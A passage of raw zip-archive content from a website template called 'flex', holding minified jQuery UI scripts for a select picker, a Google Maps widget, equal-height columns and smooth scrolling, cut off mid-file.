.close",function(){b.$button.click()}),this.$searchbox.on("click",function(a){a.stopPropagation()}),this.$menu.on("click",".actions-btn",function(c){b.options.liveSearch?b.$searchbox.focus():b.$button.focus(),c.preventDefault(),c.stopPropagation(),a(this).hasClass("bs-select-all")?b.selectAll():b.deselectAll(),b.$element.change()}),this.$element.change(function(){b.render(!1)})},liveSearchListener:function(){var d=this,e=a('<li class="no-results"></li>');this.$newElement.on("click.dropdown.data-api touchstart.dropdown.data-api",function(){d.$menuInner.find(".active").removeClass("active"),d.$searchbox.val()&&(d.$searchbox.val(""),d.$lis.not(".is-hidden").removeClass("hidden"),e.parent().length&&e.remove()),d.multiple||d.$menuInner.find(".selected").addClass("active"),setTimeout(function(){d.$searchbox.focus()},10)}),this.$searchbox.on("click.dropdown.data-api focus.dropdown.data-api touchend.dropdown.data-api",function(a){a.stopPropagation()}),this.$searchbox.on("input propertychange",function(){if(d.$searchbox.val()){var f=d.$lis.not(".is-hidden").removeClass("hidden").children("a");f=d.options.liveSearchNormalize?f.not(":a"+d._searchStyle()+"("+b(d.$searchbox.val())+")"):f.not(":"+d._searchStyle()+"("+d.$searchbox.val()+")"),f.parent().addClass("hidden"),d.$lis.filter(".dropdown-header").each(function(){var b=a(this),c=b.data("optgroup");0===d.$lis.filter("[data-optgroup="+c+"]").not(b).not(".hidden").length&&(b.addClass("hidden"),d.$lis.filter("[data-optgroup="+c+"div]").addClass("hidden"))});var g=d.$lis.not(".hidden");g.each(function(b){var c=a(this);c.hasClass("divider")&&(c.index()===g.eq(0).index()||c.index()===g.last().index()||g.eq(b+1).hasClass("divider"))&&c.addClass("hidden")}),d.$lis.not(".hidden, .no-results").length?e.parent().length&&e.remove():(e.parent().length&&e.remove(),e.html(d.options.noneResultsText.replace("{0}",'"'+c(d.$searchbox.val())+'"')).show(),d.$menuInner.append(e))}else d.$lis.not(".is-hidden").removeClass("hidden"),e.parent().length&&e.remove();d.$lis.filter(".active").removeClass("active"),d.$lis.not(".hidden, .divider, .dropdown-header").eq(0).addClass("active").children("a").focus(),a(this).focus()})},_searchStyle:function(){var a="icontains";switch(this.options.liveSearchStyle){case"begins":case"startsWith":a="ibegins";break;case"contains":}return a},val:function(a){return"undefined"!=typeof a?(this.$element.val(a),this.render(),this.$element):this.$element.val()},selectAll:function(){this.findLis(),this.$element.find("option:enabled").not("[data-divider], [data-hidden]").prop("selected",!0),this.$lis.not(".divider, .dropdown-header, .disabled, .hidden").addClass("selected"),this.render(!1)},deselectAll:function(){this.findLis(),this.$element.find("option:enabled").not("[data-divider], [data-hidden]").prop("selected",!1),this.$lis.not(".divider, .dropdown-header, .disabled, .hidden").removeClass("selected"),this.render(!1)},keydown:function(c){var f,h,i,j,k,l,m,n,o,d=a(this),e=d.is("input")?d.parent().parent():d.parent(),g=e.data("this"),p=":not(.disabled, .hidden, .dropdown-header, .divider)",q={32:" ",48:"0",49:"1",50:"2",51:"3",52:"4",53:"5",54:"6",55:"7",56:"8",57:"9",59:";",65:"a",66:"b",67:"c",68:"d",69:"e",70:"f",71:"g",72:"h",73:"i",74:"j",75:"k",76:"l",77:"m",78:"n",79:"o",80:"p",81:"q",82:"r",83:"s",84:"t",85:"u",86:"v",87:"w",88:"x",89:"y",90:"z",96:"0",97:"1",98:"2",99:"3",100:"4",101:"5",102:"6",103:"7",104:"8",105:"9"};if(g.options.liveSearch&&(e=d.parent().parent()),g.options.container&&(e=g.$menu),f=a("[role=menu] li a",e),o=g.$menu.parent().hasClass("open"),!o&&(c.keyCode>=48&&c.keyCode<=57||event.keyCode>=65&&event.keyCode<=90)&&(g.options.container?g.$newElement.trigger("click"):(g.setSize(),g.$menu.parent().addClass("open"),o=!0),g.$searchbox.focus()),g.options.liveSearch&&(/(^9$|27)/.test(c.keyCode.toString(10))&&o&&0===g.$menu.find(".active").length&&(c.preventDefault(),g.$menu.parent().removeClass("open"),g.options.container&&g.$newElement.removeClass("open"),g.$button.focus()),f=a("[role=menu] li:not(.disabled, .hidden, .dropdown-header, .divider)",e),d.val()||/(38|40)/.test(c.keyCode.toString(10))||0===f.filter(".active").length&&(f=g.$newElement.find("li"),f=g.options.liveSearchNormalize?f.filter(":a"+g._searchStyle()+"("+b(q[c.keyCode])+")"):f.filter(":"+g._searchStyle()+"("+q[c.keyCode]+")"))),f.length){if(/(38|40)/.test(c.keyCode.toString(10)))h=f.index(f.filter(":focus")),j=f.parent(p).first().data("originalIndex"),k=f.parent(p).last().data("originalIndex"),i=f.eq(h).parent().nextAll(p).eq(0).data("originalIndex"),l=f.eq(h).parent().prevAll(p).eq(0).data("originalIndex"),m=f.eq(i).parent().prevAll(p).eq(0).data("originalIndex"),g.options.liveSearch&&(f.each(function(b){a(this).hasClass("disabled")||a(this).data("index",b)}),h=f.index(f.filter(".active")),j=f.first().data("index"),k=f.last().data("index"),i=f.eq(h).nextAll().eq(0).data("index"),l=f.eq(h).prevAll().eq(0).data("index"),m=f.eq(i).prevAll().eq(0).data("index")),n=d.data("prevIndex"),38==c.keyCode?(g.options.liveSearch&&(h-=1),h!=m&&h>l&&(h=l),h<j&&(h=j),h==n&&(h=k)):40==c.keyCode&&(g.options.liveSearch&&(h+=1),h==-1&&(h=0),h!=m&&h<i&&(h=i),h>k&&(h=k),h==n&&(h=j)),d.data("prevIndex",h),g.options.liveSearch?(c.preventDefault(),d.hasClass("dropdown-toggle")||(f.removeClass("active").eq(h).addClass("active").children("a").focus(),d.focus())):f.eq(h).focus();else if(!d.is("input")){var s,t,r=[];f.each(function(){a(this).parent().hasClass("disabled")||a.trim(a(this).text().toLowerCase()).substring(0,1)==q[c.keyCode]&&r.push(a(this).parent().index())}),s=a(document).data("keycount"),s++,a(document).data("keycount",s),t=a.trim(a(":focus").text().toLowerCase()).substring(0,1),t!=q[c.keyCode]?(s=1,a(document).data("keycount",s)):s>=r.length&&(a(document).data("keycount",0),s>r.length&&(s=1)),f.eq(r[s-1]).focus()}if((/(13|32)/.test(c.keyCode.toString(10))||/(^9$)/.test(c.keyCode.toString(10))&&g.options.selectOnTab)&&o){if(/(32)/.test(c.keyCode.toString(10))||c.preventDefault(),g.options.liveSearch)/(32)/.test(c.keyCode.toString(10))||(g.$menu.find(".active a").click(),d.focus());else{var u=a(":focus");u.click(),u.focus(),c.preventDefault(),a(document).data("spaceSelect",!0)}a(document).data("keycount",0)}(/(^9$|27)/.test(c.keyCode.toString(10))&&o&&(g.multiple||g.options.liveSearch)||/(27)/.test(c.keyCode.toString(10))&&!o)&&(g.$menu.parent().removeClass("open"),g.options.container&&g.$newElement.removeClass("open"),g.$button.focus())}},mobile:function(){this.$element.addClass("mobile-device").appendTo(this.$newElement),this.options.container&&this.$menu.hide()},refresh:function(){this.$lis=null,this.reloadLi(),this.render(),this.checkDisabled(),this.liHeight(!0),this.setStyle(),this.setWidth(),this.$lis&&this.$searchbox.trigger("propertychange"),this.$element.trigger("refreshed.bs.select")},hide:function(){this.$newElement.hide()},show:function(){this.$newElement.show()},remove:function(){this.$newElement.remove(),this.$element.remove()}};var f=a.fn.selectpicker;a.fn.selectpicker=e,a.fn.selectpicker.Constructor=d,a.fn.selectpicker.noConflict=function(){return a.fn.selectpicker=f,this},a(document).data("keycount",0).on("keydown",'.bootstrap-select [data-toggle=dropdown], .bootstrap-select [role="menu"], .bs-searchbox input',d.prototype.keydown).on("focusin.modal",'.bootstrap-select [data-toggle=dropdown], .bootstrap-select [role="menu"], .bs-searchbox input',function(a){a.stopPropagation()}),a(window).on("load.bs.select.data-api",function(){a(".selectpicker").each(function(){var b=a(this);e.call(b,b.data())})})}(jQuery);PK!���+��flex/js/gmap.jsnu&1i�function initSPPageBuilderGMap(e){jQuery(".sppb-addon-gmap-canvas",e).each(function(t){var o=jQuery(this).attr("id"),r=Number(jQuery(this).attr("data-mapzoom")),a=jQuery(this).attr("data-infowindow"),l="true"===jQuery(this).attr("data-mousescroll"),i=jQuery(this).attr("data-maptype"),s={lat:Number(jQuery(this).attr("data-lat")),lng:Number(jQuery(this).attr("data-lng"))},n=jQuery(this).data("map_type_control"),y=jQuery(this).data("street_view_control"),p=jQuery(this).data("fullscreen_control"),m=jQuery(this).data("tmpl_url"),u=new google.maps.Map(e.getElementById(o),{zoom:r,center:s,panControl:!1,zoomControl:!1,scaleControl:!1,overviewMapControl:!1,mapTypeControl:n,mapTypeControlOptions:{style:google.maps.MapTypeControlStyle.DROPDOWN_MENU,position:google.maps.ControlPosition.TOP_RIGHT},fullscreenControl:p,fullscreenControlOptions:{position:google.maps.ControlPosition.RIGHT_TOP},streetViewControl:y,scrollwheel:l});u.setMapTypeId(google.maps.MapTypeId[i]);var c=navigator.userAgent.toLowerCase().indexOf("trident")>-1?m+"gmap-marker.png":m+"gmap-marker.svg",d=new google.maps.Marker({position:s,map:u,visible:!0,icon:c});var g=document.createElement("div");g.className="gm-zoom-wrapper";new function(e,t){var o=document.createElement("div");o.className="gm-zoom-in",e.appendChild(o);var r=document.createElement("div");r.className="gm-zoom-out",e.appendChild(r),google.maps.event.addDomListener(o,"click",function(){t.setZoom(t.getZoom()+1)}),google.maps.event.addDomListener(r,"click",function(){t.setZoom(t.getZoom()-1)})}(g,u);u.controls[google.maps.ControlPosition.TOP_LEFT].push(g);var f=jQuery(this).attr("data-show_transit"),h=jQuery(this).attr("data-show_poi"),T=jQuery(this).attr("data-water_color"),_=jQuery(this).attr("data-highway_stroke_color"),v=jQuery(this).attr("data-highway_fill_color"),j=jQuery(this).attr("data-local_stroke_color"),w=jQuery(this).attr("data-local_fill_color"),Q=jQuery(this).attr("data-poi_fill_color"),b=jQuery(this).attr("data-administrative_color"),C=jQuery(this).attr("data-landscape_color"),k=jQuery(this).attr("data-road_text_color"),P=[{featureType:"water",elementType:"geometry.fill",stylers:[{color:T}]},{featureType:"poi",elementType:"labels",stylers:[{visibility:h}]},{featureType:"transit",stylers:[{visibility:f}]},{featureType:"road.highway",elementType:"geometry.stroke",stylers:[{visibility:"on"},{color:_}]},{featureType:"road.highway",elementType:"geometry.fill",stylers:[{color:v}]},{featureType:"road.local",elementType:"geometry.stroke",stylers:[{color:j}]},{featureType:"road.local",elementType:"geometry.fill",stylers:[{visibility:"on"},{color:w},{weight:1.8}]},{featureType:"administrative",elementType:"geometry",stylers:[{color:b}]},{featureType:"landscape",elementType:"geometry.fill",stylers:[{visibility:"on"},{color:C}]},{featureType:"road",elementType:"labels.text.fill",stylers:[{color:k}]},{featureType:"road",elementType:"labels.text.stroke",stylers:[{visibility:"on"},{color:j},{saturation:-25},{weight:1.6}]},{featureType:"poi",elementType:"labels.text.fill",stylers:[{visibility:"on"},{color:k},{saturation:-50}]},{featureType:"poi",elementType:"labels.text.stroke",stylers:[{visibility:"on"},{color:j},{saturation:-25},{weight:2.8}]},{featureType:"poi",elementType:"geometry.fill",stylers:[{visibility:"on"},{color:Q}]},{featureType:"road.arterial",elementType:"geometry.fill",stylers:[{color:jQuery(this).attr("data-road_arterial_fill_color")}]},{featureType:"road.arterial",elementType:"geometry.stroke",stylers:[{color:jQuery(this).attr("data-road_arterial_stroke_color")}]}];if(u.setOptions({styles:P}),a){a=new google.maps.InfoWindow({content:atob(a)});d.addListener("click",function(){a.open(u,d)})}})}jQuery(window).load(function(){initSPPageBuilderGMap(document)});PK!�/UUflex/js/matchheight.jsnu&1i�/**
* jquery.matchHeight-min.js v0.6.0
* http://brm.io/jquery-match-height/
* License: MIT
*/
(function(c){var n=-1,f=-1,g=function(a){return parseFloat(a)||0},r=function(a){var b=null,d=[];c(a).each(function(){var a=c(this),k=a.offset().top-g(a.css("margin-top")),l=0<d.length?d[d.length-1]:null;null===l?d.push(a):1>=Math.floor(Math.abs(b-k))?d[d.length-1]=l.add(a):d.push(a);b=k});return d},p=function(a){var b={byRow:!0,property:"height",target:null,remove:!1};if("object"===typeof a)return c.extend(b,a);"boolean"===typeof a?b.byRow=a:"remove"===a&&(b.remove=!0);return b},b=c.fn.matchHeight=
function(a){a=p(a);if(a.remove){var e=this;this.css(a.property,"");c.each(b._groups,function(a,b){b.elements=b.elements.not(e)});return this}if(1>=this.length&&!a.target)return this;b._groups.push({elements:this,options:a});b._apply(this,a);return this};b._groups=[];b._throttle=80;b._maintainScroll=!1;b._beforeUpdate=null;b._afterUpdate=null;b._apply=function(a,e){var d=p(e),h=c(a),k=[h],l=c(window).scrollTop(),f=c("html").outerHeight(!0),m=h.parents().filter(":hidden");m.each(function(){var a=c(this);
a.data("style-cache",a.attr("style"))});m.css("display","block");d.byRow&&!d.target&&(h.each(function(){var a=c(this),b=a.css("display");"inline-block"!==b&&"inline-flex"!==b&&(b="block");a.data("style-cache",a.attr("style"));a.css({display:b,"padding-top":"0","padding-bottom":"0","margin-top":"0","margin-bottom":"0","border-top-width":"0","border-bottom-width":"0",height:"100px"})}),k=r(h),h.each(function(){var a=c(this);a.attr("style",a.data("style-cache")||"")}));c.each(k,function(a,b){var e=c(b),
f=0;if(d.target)f=d.target.outerHeight(!1);else{if(d.byRow&&1>=e.length){e.css(d.property,"");return}e.each(function(){var a=c(this),b=a.css("display");"inline-block"!==b&&"inline-flex"!==b&&(b="block");b={display:b};b[d.property]="";a.css(b);a.outerHeight(!1)>f&&(f=a.outerHeight(!1));a.css("display","")})}e.each(function(){var a=c(this),b=0;d.target&&a.is(d.target)||("border-box"!==a.css("box-sizing")&&(b+=g(a.css("border-top-width"))+g(a.css("border-bottom-width")),b+=g(a.css("padding-top"))+g(a.css("padding-bottom"))),
a.css(d.property,f-b+"px"))})});m.each(function(){var a=c(this);a.attr("style",a.data("style-cache")||null)});b._maintainScroll&&c(window).scrollTop(l/f*c("html").outerHeight(!0));return this};b._applyDataApi=function(){var a={};c("[data-match-height], [data-mh]").each(function(){var b=c(this),d=b.attr("data-mh")||b.attr("data-match-height");a[d]=d in a?a[d].add(b):b});c.each(a,function(){this.matchHeight(!0)})};var q=function(a){b._beforeUpdate&&b._beforeUpdate(a,b._groups);c.each(b._groups,function(){b._apply(this.elements,
this.options)});b._afterUpdate&&b._afterUpdate(a,b._groups)};b._update=function(a,e){if(e&&"resize"===e.type){var d=c(window).width();if(d===n)return;n=d}a?-1===f&&(f=setTimeout(function(){q(e);f=-1},b._throttle)):q(e)};c(b._applyDataApi);c(window).bind("load",function(a){b._update(!1,a)});c(window).bind("resize orientationchange",function(a){b._update(!0,a)})})(jQuery);


//Match Height
jQuery(function($) {
	$(window).load(function(){
		$('.match-height').matchHeight();
	});
});
PK!��n_��flex/js/SmoothScroll.jsnu&1i�// SmoothScroll.js version 1.3.8
!function(){function m(){b.keyboardSupport&&F("keydown",u)}function n(){if(!f&&document.body){f=!0;var a=document.body,e=document.documentElement,j=window.innerHeight,k=a.scrollHeight;if(g=document.compatMode.indexOf("CSS")>=0?e:a,h=a,m(),top!=self)d=!0;else if(k>j&&(a.offsetHeight<=j||e.offsetHeight<=j)){var l=document.createElement("div");l.style.cssText="position:absolute; z-index:-10000; top:0; left:0; right:0; height:"+g.scrollHeight+"px",document.body.appendChild(l);var n,o=function(){n||(n=setTimeout(function(){c||(l.style.height="0",l.style.height=g.scrollHeight+"px",n=null)},500))};setTimeout(o,10);var p={attributes:!0,childList:!0,characterData:!1};if(i=new P(o),i.observe(a,p),g.offsetHeight<=j){var q=document.createElement("div");q.style.clear="both",a.appendChild(q)}}b.fixedBackground||c||(a.style.backgroundAttachment="scroll",e.style.backgroundAttachment="scroll")}}function s(a,c,d){if(I(c,d),1!=b.accelerationMax){var e=Date.now(),f=e-r;if(f<b.accelerationDelta){var g=(1+50/f)/2;g>1&&(g=Math.min(g,b.accelerationMax),c*=g,d*=g)}r=Date.now()}if(p.push({x:c,y:d,lastX:c<0?.99:-.99,lastY:d<0?.99:-.99,start:Date.now()}),!q){var h=a===document.body,i=function(e){for(var f=Date.now(),g=0,j=0,k=0;k<p.length;k++){var l=p[k],m=f-l.start,n=m>=b.animationTime,o=n?1:m/b.animationTime;b.pulseAlgorithm&&(o=S(o));var r=l.x*o-l.lastX>>0,s=l.y*o-l.lastY>>0;g+=r,j+=s,l.lastX+=r,l.lastY+=s,n&&(p.splice(k,1),k--)}h?window.scrollBy(g,j):(g&&(a.scrollLeft+=g),j&&(a.scrollTop+=j)),c||d||(p=[]),p.length?O(i,a,1e3/b.frameRate+1):q=!1};O(i,a,0),q=!0}}function t(a){f||n();var c=a.target,d=B(c);if(!d||a.defaultPrevented||a.ctrlKey)return!0;if(H(h,"embed")||H(c,"embed")&&/\.pdf/i.test(c.src)||H(h,"object"))return!0;var e=-a.wheelDeltaX||a.deltaX||0,g=-a.wheelDeltaY||a.deltaY||0;return k&&(a.wheelDeltaX&&L(a.wheelDeltaX,120)&&(e=-120*(a.wheelDeltaX/Math.abs(a.wheelDeltaX))),a.wheelDeltaY&&L(a.wheelDeltaY,120)&&(g=-120*(a.wheelDeltaY/Math.abs(a.wheelDeltaY)))),e||g||(g=-a.wheelDelta||0),1===a.deltaMode&&(e*=40,g*=40),!(b.touchpadSupport||!K(g))||(Math.abs(e)>1.2&&(e*=b.stepSize/120),Math.abs(g)>1.2&&(g*=b.stepSize/120),s(d,e,g),a.preventDefault(),void z())}function u(a){var c=a.target,d=a.ctrlKey||a.altKey||a.metaKey||a.shiftKey&&a.keyCode!==l.spacebar;document.contains(h)||(h=document.activeElement);var e=/^(textarea|select|embed|object)$/i,f=/^(button|submit|radio|checkbox|file|color|image)$/i;if(e.test(c.nodeName)||H(c,"input")&&!f.test(c.type)||H(h,"video")||N(a)||c.isContentEditable||a.defaultPrevented||d)return!0;if((H(c,"button")||H(c,"input")&&f.test(c.type))&&a.keyCode===l.spacebar)return!0;var g,i=0,j=0,k=B(h),m=k.clientHeight;switch(k==document.body&&(m=window.innerHeight),a.keyCode){case l.up:j=-b.arrowScroll;break;case l.down:j=b.arrowScroll;break;case l.spacebar:g=a.shiftKey?1:-1,j=-g*m*.9;break;case l.pageup:j=.9*-m;break;case l.pagedown:j=.9*m;break;case l.home:j=-k.scrollTop;break;case l.end:var n=k.scrollHeight-k.scrollTop-m;j=n>0?n+10:0;break;case l.left:i=-b.arrowScroll;break;case l.right:i=b.arrowScroll;break;default:return!0}s(k,i,j),a.preventDefault(),z()}function v(a){h=a.target}function z(){clearTimeout(y),y=setInterval(function(){x={}},1e3)}function A(a,b){for(var c=a.length;c--;)x[w(a[c])]=b;return b}function B(a){var b=[],c=document.body,e=g.scrollHeight;do{var f=x[w(a)];if(f)return A(b,f);if(b.push(a),e===a.scrollHeight){var h=D(g)&&D(c),i=h||E(g);if(d&&C(g)||!d&&i)return A(b,Q())}else if(C(a)&&E(a))return A(b,a)}while(a=a.parentElement)}function C(a){return a.clientHeight+10<a.scrollHeight}function D(a){var b=getComputedStyle(a,"").getPropertyValue("overflow-y");return"hidden"!==b}function E(a){var b=getComputedStyle(a,"").getPropertyValue("overflow-y");return"scroll"===b||"auto"===b}function F(a,b){window.addEventListener(a,b,!1)}function H(a,b){return(a.nodeName||"").toLowerCase()===b.toLowerCase()}function I(a,b){a=a>0?1:-1,b=b>0?1:-1,e.x===a&&e.y===b||(e.x=a,e.y=b,p=[],r=0)}function K(a){if(a)return j.length||(j=[a,a,a]),a=Math.abs(a),j.push(a),j.shift(),clearTimeout(J),J=setTimeout(function(){window.localStorage&&(localStorage.SS_deltaBuffer=j.join(","))},1e3),!M(120)&&!M(100)}function L(a,b){return Math.floor(a/b)==a/b}function M(a){return L(j[0],a)&&L(j[1],a)&&L(j[2],a)}function N(a){var b=a.target,c=!1;if(document.URL.indexOf("www.youtube.com/watch")!=-1)do if(c=b.classList&&b.classList.contains("html5-video-controls"))break;while(b=b.parentNode);return c}function R(a){var c,d,e;return a*=b.pulseScale,a<1?c=a-(1-Math.exp(-a)):(d=Math.exp(-1),a-=1,e=1-Math.exp(-a),c=d+e*(1-d)),c*b.pulseNormalize}function S(a){return a>=1?1:a<=0?0:(1==b.pulseNormalize&&(b.pulseNormalize/=R(1)),R(a))}var h,i,y,J,a={frameRate:150,animationTime:400,stepSize:120,pulseAlgorithm:!0,pulseScale:4,pulseNormalize:1,accelerationDelta:20,accelerationMax:1,keyboardSupport:!0,arrowScroll:50,touchpadSupport:!0,fixedBackground:!0,excluded:""},b=a,c=!1,d=!1,e={x:0,y:0},f=!1,g=document.documentElement,j=[],k=/^Mac/.test(navigator.platform),l={left:37,up:38,right:39,down:40,spacebar:32,pageup:33,pagedown:34,end:35,home:36},b=a,p=[],q=!1,r=Date.now(),w=function(){var a=0;return function(b){return b.uniqueID||(b.uniqueID=a++)}}(),x={};window.localStorage&&localStorage.SS_deltaBuffer&&(j=localStorage.SS_deltaBuffer.split(","));var T,O=function(){return window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||function(a,b,c){window.setTimeout(a,c||1e3/60)}}(),P=window.MutationObserver||window.WebKitMutationObserver||window.MozMutationObserver,Q=function(){var a;return function(){if(!a){var b=document.createElement("div");b.style.cssText="height:10000px;width:1px;",document.body.appendChild(b);var c=document.body.scrollTop;document.documentElement.scrollTop;window.scrollBy(0,1),a=document.body.scrollTop!=c?document.body:document.documentElement,window.scrollBy(0,-1),document.body.removeChild(b)}return a}}();"onwheel"in document.createElement("div")?T="wheel":"onmousewheel"in document.createElement("div")&&(T="mousewheel"),T&&(F(T,t),F("mousedown",v),F("load",n))}();PK!�
QQvvflex/js/SmoothScroll-1.4.10.jsnu&1i�// SmoothScroll.js version 1.4.10 (http://www.smoothscroll.net/)
// https://cdnjs.com/libraries/smoothscroll
!function(){var s,i,c,a,o={frameRate:150,animationTime:400,stepSize:100,pulseAlgorithm:!0,pulseScale:4,pulseNormalize:1,accelerationDelta:50,accelerationMax:3,keyboardSupport:!0,arrowScroll:50,fixedBackground:!0,excluded:""},p=o,u=!1,d=!1,n={x:0,y:0},f=!1,m=document.documentElement,l=[],h=/^Mac/.test(navigator.platform),w={left:37,up:38,right:39,down:40,spacebar:32,pageup:33,pagedown:34,end:35,home:36},v={37:1,38:1,39:1,40:1};function y(){if(!f&&document.body){f=!0;var e=document.body,t=document.documentElement,o=window.innerHeight,n=e.scrollHeight;if(m=0<=document.compatMode.indexOf("CSS")?t:e,s=e,p.keyboardSupport&&Y("keydown",x),top!=self)d=!0;else if(Q&&o<n&&(e.offsetHeight<=o||t.offsetHeight<=o)){var r,a=document.createElement("div");a.style.cssText="position:absolute; z-index:-10000; top:0; left:0; right:0; height:"+m.scrollHeight+"px",document.body.appendChild(a),c=function(){r=r||setTimeout(function(){u||(a.style.height="0",a.style.height=m.scrollHeight+"px",r=null)},500)},setTimeout(c,10),Y("resize",c);if((i=new R(c)).observe(e,{attributes:!0,childList:!0,characterData:!1}),m.offsetHeight<=o){var l=document.createElement("div");l.style.clear="both",e.appendChild(l)}}p.fixedBackground||u||(e.style.backgroundAttachment="scroll",t.style.backgroundAttachment="scroll")}}var b=[],g=!1,r=Date.now();function S(d,f,m){if(function(e,t){e=0<e?1:-1,t=0<t?1:-1,n.x===e&&n.y===t||(n.x=e,n.y=t,b=[],r=0)}(f,m),1!=p.accelerationMax){var e=Date.now()-r;if(e<p.accelerationDelta){var t=(1+50/e)/2;1<t&&(t=Math.min(t,p.accelerationMax),f*=t,m*=t)}r=Date.now()}if(b.push({x:f,y:m,lastX:f<0?.99:-.99,lastY:m<0?.99:-.99,start:Date.now()}),!g){var o=q(),h=d===o||d===document.body;null==d.$scrollBehavior&&function(e){var t=M(e);if(null==B[t]){var o=getComputedStyle(e,"")["scroll-behavior"];B[t]="smooth"==o}return B[t]}(d)&&(d.$scrollBehavior=d.style.scrollBehavior,d.style.scrollBehavior="auto");var w=function(e){for(var t=Date.now(),o=0,n=0,r=0;r<b.length;r++){var a=b[r],l=t-a.start,i=l>=p.animationTime,c=i?1:l/p.animationTime;p.pulseAlgorithm&&(c=F(c));var s=a.x*c-a.lastX>>0,u=a.y*c-a.lastY>>0;o+=s,n+=u,a.lastX+=s,a.lastY+=u,i&&(b.splice(r,1),r--)}h?window.scrollBy(o,n):(o&&(d.scrollLeft+=o),n&&(d.scrollTop+=n)),f||m||(b=[]),b.length?j(w,d,1e3/p.frameRate+1):(g=!1,null!=d.$scrollBehavior&&(d.style.scrollBehavior=d.$scrollBehavior,d.$scrollBehavior=null))};j(w,d,0),g=!0}}function e(e){f||y();var t=e.target;if(e.defaultPrevented||e.ctrlKey)return!0;if(N(s,"embed")||N(t,"embed")&&/\.pdf/i.test(t.src)||N(s,"object")||t.shadowRoot)return!0;var o=-e.wheelDeltaX||e.deltaX||0,n=-e.wheelDeltaY||e.deltaY||0;h&&(e.wheelDeltaX&&K(e.wheelDeltaX,120)&&(o=e.wheelDeltaX/Math.abs(e.wheelDeltaX)*-120),e.wheelDeltaY&&K(e.wheelDeltaY,120)&&(n=e.wheelDeltaY/Math.abs(e.wheelDeltaY)*-120)),o||n||(n=-e.wheelDelta||0),1===e.deltaMode&&(o*=40,n*=40);var r=z(t);return r?!!function(e){if(!e)return;l.length||(l=[e,e,e]);e=Math.abs(e),l.push(e),l.shift(),clearTimeout(a),a=setTimeout(function(){try{localStorage.SS_deltaBuffer=l.join(",")}catch(e){}},1e3);var t=120<e&&P(e),o=!P(120)&&!P(100)&&!t;return e<50||o}(n)||(1.2<Math.abs(o)&&(o*=p.stepSize/120),1.2<Math.abs(n)&&(n*=p.stepSize/120),S(r,o,n),e.preventDefault(),void C()):!d||!W||(Object.defineProperty(e,"target",{value:window.frameElement}),parent.wheel(e))}function x(e){var t=e.target,o=e.ctrlKey||e.altKey||e.metaKey||e.shiftKey&&e.keyCode!==w.spacebar;document.body.contains(s)||(s=document.activeElement);var n=/^(button|submit|radio|checkbox|file|color|image)$/i;if(e.defaultPrevented||/^(textarea|select|embed|object)$/i.test(t.nodeName)||N(t,"input")&&!n.test(t.type)||N(s,"video")||function(e){var t=e.target,o=!1;if(-1!=document.URL.indexOf("www.youtube.com/watch"))do{if(o=t.classList&&t.classList.contains("html5-video-controls"))break}while(t=t.parentNode);return o}(e)||t.isContentEditable||o)return!0;if((N(t,"button")||N(t,"input")&&n.test(t.type))&&e.keyCode===w.spacebar)return!0;if(N(t,"input")&&"radio"==t.type&&v[e.keyCode])return!0;var r=0,a=0,l=z(s);if(!l)return!d||!W||parent.keydown(e);var i=l.clientHeight;switch(l==document.body&&(i=window.innerHeight),e.keyCode){case w.up:a=-p.arrowScroll;break;case w.down:a=p.arrowScroll;break;case w.spacebar:a=-(e.shiftKey?1:-1)*i*.9;break;case w.pageup:a=.9*-i;break;case w.pagedown:a=.9*i;break;case w.home:l==document.body&&document.scrollingElement&&(l=document.scrollingElement),a=-l.scrollTop;break;case w.end:var c=l.scrollHeight-l.scrollTop-i;a=0<c?10+c:0;break;case w.left:r=-p.arrowScroll;break;case w.right:r=p.arrowScroll;break;default:return!0}S(l,r,a),e.preventDefault(),C()}function t(e){s=e.target}var k,D,M=(k=0,function(e){return e.uniqueID||(e.uniqueID=k++)}),E={},T={},B={};function C(){clearTimeout(D),D=setInterval(function(){E=T=B={}},1e3)}function H(e,t,o){for(var n=o?E:T,r=e.length;r--;)n[M(e[r])]=t;return t}function z(e){var t=[],o=document.body,n=m.scrollHeight;do{var r=(!1?E:T)[M(e)];if(r)return H(t,r);if(t.push(e),n===e.scrollHeight){var a=O(m)&&O(o)||X(m);if(d&&L(m)||!d&&a)return H(t,q())}else if(L(e)&&X(e))return H(t,e)}while(e=e.parentElement)}function L(e){return e.clientHeight+10<e.scrollHeight}function O(e){return"hidden"!==getComputedStyle(e,"").getPropertyValue("overflow-y")}function X(e){var t=getComputedStyle(e,"").getPropertyValue("overflow-y");return"scroll"===t||"auto"===t}function Y(e,t,o){window.addEventListener(e,t,o||!1)}function A(e,t,o){window.removeEventListener(e,t,o||!1)}function N(e,t){return e&&(e.nodeName||"").toLowerCase()===t.toLowerCase()}if(window.localStorage&&localStorage.SS_deltaBuffer)try{l=localStorage.SS_deltaBuffer.split(",")}catch(e){}function K(e,t){return Math.floor(e/t)==e/t}function P(e){return K(l[0],e)&&K(l[1],e)&&K(l[2],e)}var $,j=window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||function(e,t,o){window.setTimeout(e,o||1e3/60)},R=window.MutationObserver||window.WebKitMutationObserver||window.MozMutationObserver,q=($=document.scrollingElement,function(){if(!$){var e=document.createElement("div");e.style.cssText="height:10000px;width:1px;",document.body.appendChild(e);var t=document.body.scrollTop;document.documentElement.scrollTop,window.scrollBy(0,3),$=document.body.scrollTop!=t?document.body:document.documentElement,window.scrollBy(0,-3),document.body.removeChild(e)}return $});function V(e){var t;return((e*=p.pulseScale)<1?e-(1-Math.exp(-e)):(e-=1,(t=Math.exp(-1))+(1-Math.exp(-e))*(1-t)))*p.pulseNormalize}function F(e){return 1<=e?1:e<=0?0:(1==p.pulseNormalize&&(p.pulseNormalize/=V(1)),V(e))}var I=window.navigator.userAgent,_=/Edge/.test(I),W=/chrome/i.test(I)&&!_,U=/safari/i.test(I)&&!_,G=/mobile/i.test(I),J=/Windows NT 6.1/i.test(I)&&/rv:11/i.test(I),Q=U&&(/Version\/8/i.test(I)||/Version\/9/i.test(I)),Z=(W||U||J)&&!G,ee=!1;try{window.addEventListener("test",null,Object.defineProperty({},"passive",{get:function(){ee=!0}}))}catch(e){}var te=!!ee&&{passive:!1},oe="onwheel"in document.createElement("div")?"wheel":"mousewheel";function ne(e){for(var t in e)o.hasOwnProperty(t)&&(p[t]=e[t])}oe&&Z&&(Y(oe,e,te),Y("mousedown",t),Y("load",y)),ne.destroy=function(){i&&i.disconnect(),A(oe,e),A("mousedown",t),A("keydown",x),A("resize",c),A("load",y)},window.SmoothScrollOptions&&ne(window.SmoothScrollOptions),"function"==typeof 